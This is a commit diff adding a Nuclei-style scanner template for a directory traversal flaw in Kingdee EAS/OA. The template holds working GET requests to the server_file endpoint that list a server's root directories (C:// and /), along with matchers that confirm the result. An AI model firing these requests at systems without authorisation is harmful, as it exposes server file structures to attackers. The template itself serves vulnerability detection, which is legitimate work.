Create kingdee-eas-directory-traversal.yaml
parent
2b1a5ca6f8
commit
cd16ff171d
|
@ -0,0 +1,33 @@
|
|||
id: kingdee-eas-directory-traversal
|
||||
|
||||
info:
|
||||
name: kingdee-eas-directory-traversal
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
tags: kingdee,directorytraversal,kingdee-eas,lfi
|
||||
description: Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal.
|
||||
reference:
|
||||
- https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix="
|
||||
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "{\"name\":\"Windows\",\"path\":\"C:\\\\Windows\",\"folder\":true}"
|
||||
- "{\"name\":\"root\",\"path\":\"/root\",\"folder\":true}"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Type: application/json"
|
||||
part: header
|
Loading…
Reference in New Issue